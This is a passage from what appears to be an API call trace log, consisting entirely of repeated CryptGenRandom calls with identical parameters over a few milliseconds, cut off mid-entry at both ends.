pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.056] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.057] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.059] CryptGenRandom (in: 